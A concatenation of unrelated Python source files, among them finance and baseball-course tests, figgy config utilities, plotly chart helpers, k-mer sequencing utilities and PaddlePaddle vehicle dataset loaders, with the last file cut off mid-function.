import unittest from tests import StockMapStub from stockpy.metrics.finance import roe from stockpy import expr from stockpy.filter import horse class RoeTest(unittest.TestCase): @classmethod def setUpClass(cls): data = { 'n_income_attr_p': { 2019: { 1: 2, 3: 53413057.75 }, 2018: { 1: 4, 2: 5, 3: 7, 4: 58366455.95, }, 2017: { 4: 42248863.96, }, 2016: { 4: 32708951.81, }, 2015: { 4: 18219460.42, }, 2014: { 4: 18906255.13, }, 2013: { 4: 14239832.62, } }, 'total_hldr_eqy_exc_min_int': { 2019: { 1: 318311778.58, 3: 357482918.8 }, 2018: { 1: 4, 2: 5, 3: 7, 4: 319545061.05, }, 2017: { 4: 192981208.87, }, 2016: { 4: 162728344.91, }, 2015: { 4: 23332404.42, }, 2014: { 4: 96162944.0, }, 2013: { 4: 77256688.87, }, 2012: { 4: 123016856.25, } }, } cls.stock = StockMapStub(data) def test_roe_y(self): m = roe.roe_y() # n_income_arrt_p(2019.1) / ((total_hldr_eqy_exc_min_int(2018.4) # +total_hldr_eqy_exc_min_int(2019.1)) # /2) def run(y, q): v = m.expr.eval(self.stock, y, 4) s1 = expr.Get('n_income_attr_p').eval(self.stock, y, q) s2 = expr.Get('total_hldr_eqy_exc_min_int').eval(self.stock, y, q) s3 = expr.Get('total_hldr_eqy_exc_min_int').eval( self.stock, y-1, q) a = s1/((s2+s3)/2) print(y, q, a, v) self.assertEqual(a, v, '{} {}'.format(y, q)) run(2018, 4) run(2017, 4) # 42248863.96/((192981208.87+162728344.91)/2) run(2016, 4) run(2015, 4) run(2014, 4) run(2013, 4) def test_range_roe(self): # n_income_arrt_p(2019.1) / ((total_hldr_eqy_exc_min_int(2018.4) # +total_hldr_eqy_exc_min_int(2019.1)) # /2) def run(y, q): rm = expr.Range(expr.Before(expr.Get('f_roe_y'), past_year=1), year_count=6) nm = self.roe_ge_15_pct_now() v = rm.eval(self.stock, y, 4) v2 = expr.Ge(rm, expr.Value(0.15)).eval(self.stock, y, 4) print('last 6 years', v, v2) v3 = nm.eval(self.stock, y, q) print('current', v3, expr.Get('f_roe').eval(self.stock, y, q)) v4 = expr.And(expr.Ge(rm, expr.Value(0.15)), nm).eval(self.stock, y, q) print('last 7 years', v4) run(2019, 3) m = horse.roe_ge_15_pct_last_7_year() v = m.eval(self.stock, 2019, 3) print('last 7 years 2', v) def roe_ge_15_pct_now(self): def fv(stock: expr.ExprCtx, year: int, quarter: int): v = { 4: 0.15, 3: 0.15/4*3, 2: 0.15/4*2, 1: 0.15/4, } return v[quarter] return expr.Ge( expr.Get('f_roe'), expr.FuncValue(fv) ) def test_roe_ttm(self): m = roe.roe_ttm() # n_income_arrt_p(2019.1) / ((total_hldr_eqy_exc_min_int(2018.4) # +total_hldr_eqy_exc_min_int(2019.1)) # /2) v = m.expr.eval(self.stock, 2019, 1) s1 = expr.Get('f_income_attr_p_ttm').eval(self.stock, 2019, 1) s2 = expr.Get('total_hldr_eqy_exc_min_int').eval(self.stock, 2019, 1) s3 = expr.Get('total_hldr_eqy_exc_min_int').eval(self.stock, 2018, 1) self.assertEqual(s1/(s2+s3)*2, v)
StarcoderdataPython
3289706
<reponame>serrabaum/Python-Baseball import pytest import matplotlib matplotlib.use('Agg') from .utils import get_assignments, get_calls from stats import offense @pytest.mark.test_select_all_plays_module4 def test_select_all_plays_module4(): assert 'games' in dir(offense), 'Have you imported `games` from `data`?' assert 'plays:games:games:type:play' in get_assignments(offense), 'Select the `play` rows of the `games` DataFrame.' assert 'plays:columns:type:inning:team:player:count:pitches:event:game_id:year' in get_assignments(offense), 'Set the correct column labels of the `games` DataFrame.' @pytest.mark.test_select_only_hits_module4 def test_select_only_hits_module4(): assert 'hits:plays:loc:plays:event:str:contains:^(?:S(?!B)|D|T|HR):inning:event' in get_assignments(offense), 'Refine the `games` DataFrame to contain only hits. Store the new DataFrame in a variable called `hits`.' @pytest.mark.test_convert_column_type_module4 def test_convert_column_type_module4(): assert 'hits:loc:None:None:None:inning:pd:to_numeric:hits:loc:None:None:None:inning' in get_assignments(offense), 'Change the data type of the `inning` column to numeric.' @pytest.mark.test_replace_dictionary_module4 def test_replace_dictionary_module4(): assert 'replacements:^S(.*):^D(.*):^T(.*):^HR(.*):single:double:triple:hr' in get_assignments(offense), '`replacements` is not a dictionary, doesn\'t exist, or contains the wrong values.' @pytest.mark.test_replace_function_module4 def test_replace_function_module4(): assert 'hit_type:hits:event:replace:replacements:regex:True' in get_assignments(offense), 'The `replace()` function is not used to replace the event column with the correct hit type.' @pytest.mark.test_add_a_new_column_module4 def test_add_a_new_column_module4(): assert 'hits:hits:assign:hit_type:hit_type' in get_assignments(offense), 'The new `hit_type` column has not been assign to the `hits` DataFrame.' @pytest.mark.test_group_by_inning_and_hit_type_module4 def test_group_by_inning_and_hit_type_module4(): assert 'hits:hits:groupby:inning:hit_type:size:reset_index:name:count' in get_assignments(offense), 'The `hits` DataFrame is not properly grouped.' @pytest.mark.test_convert_hit_type_to_categorical_module4 def test_convert_hit_type_to_categorical_module4(): assert 'hits:hit_type:pd:Categorical:hits:hit_type:single:double:triple:hr' in get_assignments(offense), 'The `hit_type` column is not `Categorical`.' @pytest.mark.test_sort_values_module4 def test_sort_values_module4(): assert 'hits:hits:sort_values:inning:hit_type' in get_assignments(offense), 'The `hits` DataFrame has not been sorted by `inning`.' @pytest.mark.test_reshape_with_pivot_module4 def test_reshape_with_pivot_module4(): pivot = False index = False columns = False values = False for string in get_assignments(offense): if 'hits:hits:pivot' in string: pivot = True if 'index:inning' in string: index = True if 'columns:hit_type' in string: columns = True if 'values:count' in string: values = True assert pivot, 'Are you calling `pivot()` on the `hits` DataFrame?' assert index, 'Does the call to `pivot()` have a keyword argument of `index` set to `\'inning\'`?' assert columns, 'Does the call to `pivot()` have a keyword argument of `columns` set to `\'strike_outs\'`?' assert values, 'Does the call to `pivot()` have a keyword argument of `values` set to `\'count\'`?' @pytest.mark.test_stacked_bar_plot_module4 def test_stacked_bar_plot_module4(): assert 'hits:plot:bar:stacked:True' in get_calls(offense), 'A stacked bar chart has not been plotted.' assert 'plt:show' in get_calls(offense), 'The plot has not been shown.'
StarcoderdataPython
1638475
def get_config_file(): import os path = os.path.abspath(__file__) f = os.path.join(os.path.dirname(path), 'setup.cfg.tpl') return open(f).read()
StarcoderdataPython
3264852
<reponame>figtools/figgy-cli<filename>src/figcli/extras/key_utils.py import re from typing import Set, Dict from figcli.config import * class KeyUtils(object): @staticmethod def find_all_expected_names(config_keys: set, shared_names: set, merge_conf: dict, repl_conf: dict, repl_from_conf: dict, namespace: str) -> Set[str]: """ From various sets of keys and configs, calculates all required PS Names (keys) this application requires. Args: config_keys: set -> representing the app_figs in the passed in figgy.json file shared_names: set -> representing the shared_figs in the passed in figgy.json file merge_conf: dict -> representing the merged_figs in the passed in figgy.json file repl_conf: dict -> representing the replicate_figs in the figgy.json file repl_from_conf: dict -> represents the `replicate_from` config block in the figgy.json file namespace: parsed, or calculated namespace for the application being synced. E.G. /app/demo-time/ Returns: Set[str] -> All PS Names that have been defined as dependencies for this application's deployment """ merge_keys = set(merge_conf.keys()) all_keys = config_keys | shared_names | merge_keys for merge_key, merge_val in merge_conf.items(): if type(merge_val) == list: for val in merge_val: if KeyUtils.sanitize(val).startswith(namespace): all_keys.add(KeyUtils.sanitize(val)) elif type(merge_val) == str: matches = re.findall('\${([\w/-]+)}', merge_val) for match in matches: if match.startswith(namespace): all_keys.add(KeyUtils.sanitize(match)) for key in repl_conf: all_keys.add(repl_conf[key]) source_ns = repl_from_conf.get(SOURCE_NS_KEY) params = repl_from_conf.get(PARAMETERS_KEY) if source_ns and params: for param in params: all_keys.add(f'{namespace}{param}') return all_keys @staticmethod def merge_repl_and_repl_from_blocks(repl_conf: Dict, repl_from: Dict, dest_namespace: str) -> Dict: """ Parses the repl_from block and merges it into the standard 'replication' block. This simplifies configuring replication and detecting strays. Args: repl_conf: Dict representing the `replicate_figs` block in figgy.json file repl_from: Dict representing the `replicate_frorm` block in figgy.json file dest_namespace: namespace found in the `figgy.json` file. Where replication is destined for. Returns: an updated repl_conf dictionary with repl_from figcli.configs merged into it. """ source_ns = repl_from.get(SOURCE_NS_KEY) params = repl_from.get(PARAMETERS_KEY) dest_namespace = dest_namespace if dest_namespace.endswith('/') else f'{dest_namespace}/' if source_ns and params: source_ns = source_ns if source_ns.endswith('/') else f'{source_ns}/' for param in params: repl_conf[f'{source_ns}{param}'] = f'{dest_namespace}{param}' return repl_conf @staticmethod def sanitize(merge_val): return merge_val.replace("${", "").replace("}", "").replace(merge_uri_suffix, "") @staticmethod def desanitize(merge_val): return "${" + merge_val + "}"
StarcoderdataPython
3381939
<filename>src/analyticViz/viz.py import plotly.express as px import plotly.figure_factory as ff """ This is a script that contains functions needed for plotting various visualizations using plotly The various viz includes; * Bar Chart (Horizontal) * Bar Chart (Vertical) * Stacked bar chart * Clustered bar chart * Pie Chart * Histogram * Box plots * Facet row plots * Sunburst * Violin Plot """ def Vbar(data, x_col, y_col, text, title=None, x_title=None, y_title=None, color=None, mode=None): """ Function that plots a vertical bar chart Args: data: dataframe - pandas dataframe x_col: str - column in the dataframe to be plotted on the x-axis y_col: str - column in the dataframe to be plotted on the y-axis text: str - column name to be used as text display on the bar chart title: str - text to be displyed as title for the plot x_title: str - text to be displayed on the x-axis y_title: str - text to be displayed on the y-axis color: str - column name that you want stacked mode: str - indicate whether stacked or group(side by side plot) Returns: fig: plot - bar plot to be displayed """ # plot bar chart fig = px.bar(data, x=x_col, y=y_col, text=text, color=color, barmode=mode, color_discrete_sequence=px.colors.qualitative.D3) # edit contents of bar chart fig.update_traces(texttemplate='%{text:.1s}', textposition='outside', cliponaxis=False, textfont={'family':"Arial",'size': 13,'color': "black"}) # edit outline of bar chart fig.update_xaxes(title_text=x_title, automargin=True, categoryorder='total ascending', type='category') fig.update_yaxes(title_text=y_title, automargin=True) fig.update_layout(title_text=title, yaxis=dict(visible=False), autosize=False, plot_bgcolor='rgba(0,0,0,0)', title_x=0.5,uniformtext_minsize=5) return fig.show() def Hbar(data, x_col, y_col, text, title=None, x_title=None, y_title=None, color=None, f_col=None, f_row=None): """ Function that plots a horizontal bar chart Args: data: dataframe - pandas dataframe x_col: str - column in the dataframe to be plotted on the x-axis y_col: str - column in the dataframe to be plotted on the y-axis text: str - column name to be used as text display on the bar chart title: str - text to be displyed as title for the plot x_title: str - text to be displayed on the x-axis y_title: str - text to be displayed on the y-axis color: str - column name that you want stacked Returns: fig: plot - bar plot to be displayed """ # plot bar chart fig = px.bar(data, x=x_col, y=y_col, text=text, orientation='h', color=color, facet_col=f_col, facet_row=f_row, color_discrete_sequence=px.colors.qualitative.D3) # edit contents of bar chart fig.update_traces(texttemplate='%{text:.1s}', textposition='outside', cliponaxis=False, textfont={'family':"Arial",'size': 13,'color': "black"}) # edit outline of bar chart fig.update_xaxes(title_text=x_title, automargin=True) fig.update_yaxes(title_text=y_title, automargin=True, categoryorder='total ascending', type='category') fig.update_layout(title_text=title, xaxis=dict(visible=False), autosize=False, plot_bgcolor='rgba(0,0,0,0)', title_x=0.5, uniformtext_minsize=5) return fig.show() def pie(data, values, labels, title=None): """ Function that plots a pie chart Args: data: dataframe - pandas dataframe values: str - column in the dataframe representing numeric values labels: str - column in the dataframe representing categorical values title: str - text to be displyed as title for the plot Returns: fig: plot - pie chart to be displayed """ # plot pie chart fig = px.pie(data, values=values, names=labels, title=title, hole=0.6, color_discrete_sequence=px.colors.qualitative.D3) # edit pie chart fig.update_traces(hoverinfo='label+value', textfont_size=12, marker=dict(line=dict(color='#000000', width=0.5))) fig.update_layout(autosize=False, plot_bgcolor='rgba(0,0,0,0)', title_x=0.46, uniformtext_minsize=5) return fig.show() def hist(data, x_col, title, plot_type, color=None, f_col=None, f_row=None): """ Function that plots a histogram Args: data: dataframe - pandas dataframe x_col: str - column in the dataframe representing numeric values title: str - text to be displyed as title for the plot plot_type: str - indcates which additional plot you need (box, violin, rug) color: str - column name to be used for multiple histograms Returns: fig: plot - histogram to be displayed """ # plot graph fig = px.histogram(data, x=x_col, marginal=plot_type, color=color, hover_data=data.columns, facet_col=f_col, facet_row=f_row, color_discrete_sequence=px.colors.qualitative.D3) # update or edit graph fig.update_layout(autosize=False, plot_bgcolor='rgba(0,0,0,0)', title_x=0.46, uniformtext_minsize=5, yaxis=dict(visible=False), title_text = title) return fig.show() def scatter(data, x_col, y_col, title=None, x_title=None, y_title=None, color=None, size=None, render=None, f_col=None, f_row=None): """ Function that plots a scatter plot Args: data: dataframe - pandas dataframe x_col: str - column in the dataframe representing numeric values y_col: str - column in the dataframe representing numeric values title: str - text to be displyed as title for the plot x_title: str - text to be displayed on the x-axis y_title: str - text to be displayed on the y-axis size: str - column name to size points with color: str - column name to be used for multiple histograms render: str - how to render the viz (webgl or svg) Returns: fig: plot - histogram to be displayed """ # plot graph fig = px.scatter(data, x=x_col, y=y_col, color=color, size=size, render_mode=render, facet_col=f_col, facet_row=f_row, color_discrete_sequence=px.colors.qualitative.D3) # edit graph fig.update_xaxes(title_text=x_title, automargin=True) fig.update_yaxes(title_text=y_title, automargin=True) fig.update_traces(marker=dict(line=dict(width=1.5, color='DarkSlateGrey')), selector=dict(mode='markers')) fig.update_layout(title_text=title, autosize=False, plot_bgcolor='rgba(0,0,0,0)', title_x=0.5, uniformtext_minsize=5) return fig.show() def line(data, x_col, y_col, x_title=None, y_title=None, title=None, color=None, f_col=None, f_row=None): """ Function that plots a line charts Args: data: dataframe - pandas dataframe x_col: str - column in the dataframe representing date values(year, month, day, week, date, datetime) y_col: str - column in the dataframe representing numeric values title: str - text to be displyed as title for the plot x_title: str - text to be displayed on the x-axis y_title: str - text to be displayed on the y-axis color: str - column name to be used for multiple line plots Returns: fig: plot - line plot to be displayed """ # plot line chart fig = px.line(data, x=x_col, y=y_col, color=color, markers=True, facet_col=f_col, facet_row=f_row, color_discrete_sequence=px.colors.qualitative.D3) # edit line chart fig.update_layout(title_text=title, yaxis=dict(visible=False), autosize=False, plot_bgcolor='rgba(0,0,0,0)', title_x=0.5, uniformtext_minsize=5) return fig.show() def sun(data, path, value, title=None): """ Function that plots a sunburst chart(pie) Args: data: dataframe - pandas dataframe value: str - column in the dataframe representing numeric values path: list - list of column names in the dataframe representing categorical values title: str - text to be displyed as title for the plot Returns: fig: plot - sunburst chart to be displayed """ # plot chart fig = px.sunburst(data, path=path, values=value, color_discrete_sequence=px.colors.qualitative.D3) #edit chart fig.update_traces(hoverinfo='label+value', textfont_size=12, marker=dict(line=dict(color='#000000', width=0.5))) fig.update_layout(title_text=title, autosize=False, plot_bgcolor='rgba(0,0,0,0)', title_x=0.46, uniformtext_minsize=5) return fig.show() def table(data, index=None): """ Function that converts pandas dataframe to plotly dataframe Args: data: dataframe - pandas dataframe index: bool - indicates if you want index to show or not Returns: fig: plot - formatted plotly table """ # plot table colorscale = [[0, '#1779bd'],[.5, '#d2e8f7'],[1, '#ffffff']] fig = ff.create_table(data, index=index, colorscale=colorscale) return fig.show() def box(data, x_col, y_col, title=None, x_title=None, y_title=None, color=None, f_col=None, f_row=None): """ Function that plots a box plot Args: data: dataframe - pandas dataframe x_col: str - column in the dataframe representing categorical values y_col: str - column in the dataframe representing numerical values title: str - text to be displyed as title for the plot x_title: str - text to be displayed on the x-axis y_title: str - text to be displayed on the y-axis color: str - column name to be used for multiple box plots Returns: fig: plot - box plot to be displayed """ # plot box plot fig = px.box(data, x=x_col, y=y_col, color=color, color_discrete_sequence=px.colors.qualitative.D3, notched=True, facet_col=f_col, facet_row=f_row) # edit plot fig.update_xaxes(title_text=x_title, automargin=True) fig.update_yaxes(title_text=y_title, automargin=True) fig.update_layout(title_text=title, yaxis=dict(visible=False), autosize=False, plot_bgcolor='rgba(0,0,0,0)', title_x=0.46, uniformtext_minsize=5) return fig.show() def violin(data, x_col, y_col, title=None, x_title=None, y_title=None, color=None, f_col=None, f_row=None): """ Function that plots a violin plot Args: data: dataframe - pandas dataframe x_col: str - column in the dataframe representing categorical values y_col: str - column in the dataframe representing numerical values title: str - text to be displyed as title for the plot x_title: str - text to be displayed on the x-axis y_title: str - text to be displayed on the y-axis color: str - column name to be used for multiple box plots Returns: fig: plot - violin plot to be displayed """ # plot box plot fig = px.violin(data, x=x_col, y=y_col, color=color, color_discrete_sequence=px.colors.qualitative.D3, box=True, facet_col=f_col, facet_row=f_row) # edit plot fig.update_xaxes(title_text=x_title, automargin=True) fig.update_yaxes(title_text=y_title, automargin=True) fig.update_layout(title_text=title, yaxis=dict(visible=False), autosize=False, plot_bgcolor='rgba(0,0,0,0)', title_x=0.46, uniformtext_minsize=5) return fig.show()
StarcoderdataPython
3270810
def parse_relationship(string): """Parses relationship from string of format A)B where A is the parent and B is the child. Args: original string Returns: Parent, Child: string, string """ parsed = string.strip().split(')') return parsed[0], parsed[1] def get_input_str(filename): """returns list of inputs from data file. Args: filename: the name of the file with the input data. Returns: a list of strings read from the file """ text_file = open(filename, "r") input_strs = text_file.readlines() text_file.close() return input_strs class Planet: """A planet - linked list - with name, parent, children, and count of the number of planets it orbits (that come between it and the base planet) """ def __init__(self, name, parent=None): self.name = name self.parent = parent self.count = None self.children = [] def set_count(self): if self.parent != None: self.count = self.parent.count +1 else: self.count = 0 def set_parent(self, parent): self.parent = parent def add_child(self, child): self.children.append(child) def build_tree(instructions): """builds a tree based on the instructions passed. Instructions expected to be a list of strings in the form parent)child. """ first_name, _ = parse_relationship(instructions[0]) first_planet = Planet(name=first_name, parent=None) planets = [first_planet] for instruction in instructions: parent_name, child_name = parse_relationship(instruction) # initialize next_planet and parent next_planet = None parent = None # search for existing planet or parent for planet in planets: if planet.name == parent_name: parent = planet elif planet.name == child_name: next_planet = planet # if no existing planet or parent, make them, and add to planet list if parent == None: parent = Planet(name=parent_name) planets.append(parent) if next_planet == None: next_planet = Planet(name=child_name) planets.append(next_planet) # add parent to the next planet next_planet.set_parent(parent) # add next planet to parent's children parent.add_child(next_planet) return planets def set_orbit_counts(planets): """sets the orbit counts by finding base planet and traversing the tree, setting the counts from root to leaf. """ base_planet = None # find base planet for planet in planets: if planet.parent == None: base_planet = planet break # traverse tree setting count base_planet.set_count() planet = base_planet s = [] s.append(planet) while len(s) > 0: planet = s.pop() planet.set_count() if planet.children != None: for child in planet.children: s.append(child) def count_orbits(planets): """counts(sums) the number of orbits from all planets """ set_orbit_counts(planets) count = 0 for planet in planets: count += planet.count return count def main(): lines = get_input_str('day6_input.txt') planets = build_tree(lines) print(count_orbits(planets)) def t(lines): """test build_tree and count_orbits without reading text file """ planets = build_tree(lines) return count_orbits(planets) if __name__ == "__main__": main()
StarcoderdataPython
3392859
# coding: utf-8 # How to use: # type 'ipython' at the terminal to get to the Interactive Python (IPython) environments # Type: # %run batch_replace_rmd.py import re methods = 'facs', 'droplet' for method in methods: rmds = get_ipython().getoutput(f'ls *{method}.Rmd') for rmd in rmds: backup = rmd + '.backup' get_ipython().system(' cp $rmd $backup') replaced = rmd + '.replaced' print(replaced) batch_name = 'channel' if method == 'droplet' else 'plate.barcode' with open(rmd) as f: content = f.read() content = content.replace(f"""filename = here('00_data_ingest', '03_tissue_annotation_csv', paste0(tissue_of_interest, "_{method}_annotation.csv")) write.csv(<EMAIL>[,c('{batch_name},'cell_ontology_class','cell_ontology_id', 'free.annotation')], file=filename) """, f""" filename = here('00_data_ingest', '03_tissue_annotation_csv', paste0(tissue_of_interest, "_{method}_annotation.csv")) write.csv(<EMAIL>[,c('{batch_name}','cell_ontology_class','cell_ontology_id', 'free.annotation')], file=filename) """ ) content = content.replace(f"""filename = here('00_data_ingest', '03_tissue_annotation_csv', paste0(tissue_of_interest, "_{method}_annotation.csv")) write.csv(<EMAIL>[,c('{batch_name}','cell_ontology_class','cell_ontology_id', 'free.annotation')], file=filename) """, f"""filename = here('00_data_ingest', '03_tissue_annotation_csv', paste0(tissue_of_interest, "_{method}_annotation.csv")) write.csv(<EMAIL>[,c('{batch_name}','cell_ontology_class','cell_ontology_id', 'free.annotation', 'cluster.ids')], file=filename) """ ) # print(content) # content = content.replace("""tissue_of_interest = "Bladder" # tiss <- ScaleData(object = tiss, vars.to.regress = c("nUMI", "percent.ribo","Rn45s"))""", """tiss <- NormalizeData(object = tiss) # tiss <- ScaleData(object = tiss)""") with open(replaced, 'w') as g: g.write(content) # get_ipython().system(f'diff Bladder_{method}.Rmd Bladder_{method}.Rmd.replaced') get_ipython().system(f'diff Lung_{method}.Rmd Lung_{method}.Rmd.replaced') replaceds = get_ipython().getoutput('ls *.Rmd.replaced') for replaced in replaceds: rmd = replaced.split('.replaced')[0] print(rmd) get_ipython().system(' mv $replaced $rmd')
StarcoderdataPython
3223573
<reponame>borisz264/mono_seq import os import operator import itertools import gzip import numpy as np from scipy import stats def old_chris_formula(R, k, read_len): """ Implements the formula Chris burge derived """ return (4 ** k -1) * ( R * (read_len - k + 1) - (read_len - k) ) / (4 ** k + read_len - k - (R *(read_len - k +1))) def chris_formula(R, k, read_len): """ Implements the formula Chris burge derived """ return (4. ** k - 1) * (read_len - k +1 ) * (R - 1) / (4. ** k -R * (read_len -k +1)) def get_adjacent_kmers(kmer): """ returns all the k+1 mers that contain the kmer """ return ['A' + kmer, 'C' + kmer, 'G' + kmer, 'T' + kmer, kmer + 'A', kmer + 'C', kmer + 'G', kmer + 'T'] def iter_RNAfold_output(energy_file): """ iterates through RNAfold input and returns an energy iterator """ for l1, l2 in iterLinePairs(energy_file): yield float(l2.split(' (')[1].replace(')', '')) def iterLinePairs(inFile): for l1, l2 in iterNlines(inFile, 2): yield l1, l2 def make_dir(dirname): """ Makes the directory; doesn't throw an error if it exists. """ if not os.path.exists(dirname): try: os.makedirs(dirname) except: print 'The directory was made by another thread extremely recently.' def file_exists(fname): """ makes sure a given file exists """ if not os.path.exists(fname): return False fstats = os.stat(fname) if not fstats[6]: return False if not os.access(fname, os.R_OK): raise ValueError('Input File %s cannot be read' % fname) return True def getBinIndex_soft_upper(v, bins): for i in range(len(bins) - 1): if v > bins[i] and v <= bins[i + 1]: return i return -1 def get_barcode(line): """ - Extracts the barcode from the first line of a fastq quartet - Assumes the first line is of the form: @D5FF8JN1:4:1101:1220:2099#ACTTGA/1 """ return line.split('#')[-1].split('/')[0] def get_index_from_kmer(kmer): """ returns the base10 version of the base 4 DNA representation """ index = 0 base2face = {'A': 0, 'C': 1, 'G': 2, 'T': 3} for i, base in enumerate(kmer): if not base in 'ACGT': return -1 power = len(kmer) - 1 - i index += base2face[base] * (4 ** power) return index def get_kmer_from_index(kmax, index): """ takes a number (essentially base 4) and returns the kmer it corresponds to in alphabetical order eg. AAAA = 0*1 CA = 4*4 + 0*1 GC = 3*4 + 1 * 1 """ bases = 'ACGT' out = '' for k in range(kmax - 1, -1, -1): face, index = divmod(index, 4 ** k) out += bases[face] return out def yield_kmers(k): """ An iterater to all kmers of length k in alphabetical order """ bases = 'ACGT' for kmer in itertools.product(bases, repeat=k): yield ''.join(kmer) def aopen(file, mode='r'): if file[-3:] == '.gz': return gzip.open(file, mode + 'b') else: return open(file, mode) def hamming_N(str1, str2): if not len(str1) == len(str2): raise(ValueError, 'lengths don\'t match') str1 = str1.upper() str2 = str2.upper() str1 = str1.replace('N', '#') return sum(itertools.imap(operator.ne, str1, str2)) def pairwise(iterable): """s -> (s0,s1), (s1,s2), (s2, s3), ...""" a, b = itertools.tee(iterable) next(b, None) return itertools.izip(a, b) # from http://code.activestate.com/recipes/499304-hamming-distance/ def hamming_distance(str1, str2): assert len(str1) == len(str2) ne = operator.ne return sum(itertools.imap(ne, str1, str2)) def iterNlines(inFile, N): assert N >= 1 with aopen(inFile) as f: lines = [f.readline() for i in range(N)] while True: yield lines lines = [f.readline() for i in range(N)] if lines[0] == '': break def save_fig(fig1, path, extensions=['png', 'pdf']): for ext in extensions: fig1.savefig(path + '.' + ext, transparent=True, dpi = 900) def simpleaxis(sp): sp.spines['top'].set_visible(False) sp.spines['right'].set_visible(False) sp.get_xaxis().tick_bottom() sp.get_yaxis().tick_left() def close_float_value(a, b, max_percent=1.0): if a == 0 and b == 0: return True if not (a > 0 and b > 0): return False ratio = float(max(a, b)) / float(min(a, b)) percent_increase = (ratio - 1.0) * 100.0 return percent_increase < max_percent def significantly_enriched(xs, zthresh=2., scale='linear'): assert scale in ['linear', 'log'] if scale =='log': xs = np.log2(xs) xs = stats.zscore(xs) return [x > zthresh for x in xs] def iter4Lines(inFile): return iterNlines(inFile, 4) def getAllMismatchedSeqs(kmer, mismatchPositions): nucs = ['A', 'C', 'G', 'T'] #generate tuples of allowed nucs at each mismatch position using a recursive algorithm allowedNucs = {} mismatchPositions = np.array(mismatchPositions) assert len(set(mismatchPositions)) == len(mismatchPositions) if len(mismatchPositions) == 0: yield kmer else: mismatchNucs = [] + nucs #print kmer #print mismatchPositions #print mismatchPositions[0] #print kmer[mismatchPositions[0]] mismatchNucs.remove(kmer[mismatchPositions[0]]) downstreamMismatchSeqs = getAllMismatchedSeqs(kmer[mismatchPositions[0]+1:], mismatchPositions[1:]-(mismatchPositions[0]+1)) for mismatchNuc in mismatchNucs: for downstreamMismatchSeq in downstreamMismatchSeqs: returnSeq = kmer[:mismatchPositions[0]] + mismatchNuc +downstreamMismatchSeq assert len(returnSeq) == len(kmer) yield returnSeq def getPaddedMismatchedAdjacentKmers(kmerSequence, padding, numMismatches): ''' Yield all sequences of length (len(kmerSequence)+padding )that contain the given kmer, with exactly the given number of mismatches. The order yielded is as follows: First mismatches are allowed at position 0 to (numMismatches-1) For each register: Iterate through all possible nucs at mismatch position in alphabetical order Iterate through each nucleotide in padding positions in alphabetical order. Shift to next register Move most 3' mismatch position down by one, but not past the end of the kmerSequence if end of KmerSequence is reached, shift secondmost 3' mismatch 1 nt 3', and reset most 3' mismatch to 1nt 3' of that one ''' # for troubleshooting, want to check that no repeats are generated, so will assert that size of this list and set # must be the same kmer_set = set() kmer_list =[] upper_to_combined = {} nucs = 'ACGT' #initialize mismatchPositions #print numMismatches if numMismatches == 0: for mismatchedKmer in [kmerSequence]: for shift in range(padding+1): #generate all possible mismatches to the kmer for leftPaddingSeq in [''.join(i) for i in itertools.product(nucs, repeat = shift)]: for rightPaddingSeq in [''.join(i) for i in itertools.product(nucs, repeat = padding-shift)]: paddedSeq = leftPaddingSeq+mismatchedKmer+rightPaddingSeq if paddedSeq not in kmer_set: kmer_list.append(paddedSeq) kmer_set.add(paddedSeq) else: mismatchPositionsList = itertools.combinations(range(len(kmerSequence)), numMismatches) for mismatchPositions in mismatchPositionsList: #print mismatchPositions for mismatchedKmer in getAllMismatchedSeqs(kmerSequence, mismatchPositions): for shift in range(padding+1): #generate all possible mismatches to the kmer for leftPaddingSeq in [''.join(i) for i in itertools.product(nucs, repeat = shift)]: for rightPaddingSeq in [''.join(i) for i in itertools.product(nucs, repeat = padding-shift)]: paddedSeq = leftPaddingSeq+mismatchedKmer+rightPaddingSeq paddedUpper = paddedSeq.upper() if paddedUpper not in kmer_set: kmer_list.append(paddedUpper) kmer_set.add(paddedUpper) #print kmer_list #print kmer_set #print len(kmer_list), len(kmer_set) #assert len(kmer_list) == len(kmer_set) return kmer_list
StarcoderdataPython
4835289
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import print_function import numpy as np import paddle from paddle.io import Dataset import os import cv2 from ppcls.data import preprocess from ppcls.data.preprocess import transform from ppcls.utils import logger from .common_dataset import create_operators class CompCars(Dataset): def __init__(self, image_root, cls_label_path, label_root=None, transform_ops=None, bbox_crop=False): self._img_root = image_root self._cls_path = cls_label_path self._label_root = label_root if transform_ops: self._transform_ops = create_operators(transform_ops) self._bbox_crop = bbox_crop self._dtype = paddle.get_default_dtype() self._load_anno() def _load_anno(self): assert os.path.exists(self._cls_path) assert os.path.exists(self._img_root) if self._bbox_crop: assert os.path.exists(self._label_root) self.images = [] self.labels = [] self.bboxes = [] with open(self._cls_path) as fd: lines = fd.readlines() for l in lines: l = l.strip().split() if not self._bbox_crop: self.images.append(os.path.join(self._img_root, l[0])) self.labels.append(int(l[1])) else: label_path = os.path.join(self._label_root, l[0].split('.')[0] + '.txt') assert os.path.exists(label_path) with open(label_path) as f: bbox = f.readlines()[-1].strip().split() bbox = [int(x) for x in bbox] self.images.append(os.path.join(self._img_root, l[0])) self.labels.append(int(l[1])) self.bboxes.append(bbox) assert os.path.exists(self.images[-1]) def __getitem__(self, idx): img = cv2.imread(self.images[idx]) img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) if self._bbox_crop: bbox = self.bboxes[idx] img = img[bbox[1]:bbox[3], bbox[0]:bbox[2], :] if self._transform_ops: img = transform(img, self._transform_ops) img = img.transpose((2, 0, 1)) return (img, self.labels[idx]) def __len__(self): return len(self.images) @property def class_num(self): return len(set(self.labels)) class VeriWild(Dataset): def __init__( self, image_root, cls_label_path, transform_ops=None, ): self._img_root = image_root self._cls_path = cls_label_path if transform_ops: self._transform_ops = create_operators(transform_ops) self._dtype = paddle.get_default_dtype() self._load_anno() def _load_anno(self): assert os.path.exists(self._cls_path) assert os.path.exists(self._img_root) self.images = [] self.labels = [] self.cameras = [] with open(self._cls_path) as fd: lines = fd.readlines() for l in lines: l = l.strip().split() self.images.append(os.path.join(self._img_root, l[0])) self.labels.append(np.int64(l[1])) self.cameras.append(np.int64(l[2])) assert os.path.exists(self.images[-1]) def __getitem__(self, idx): try: with 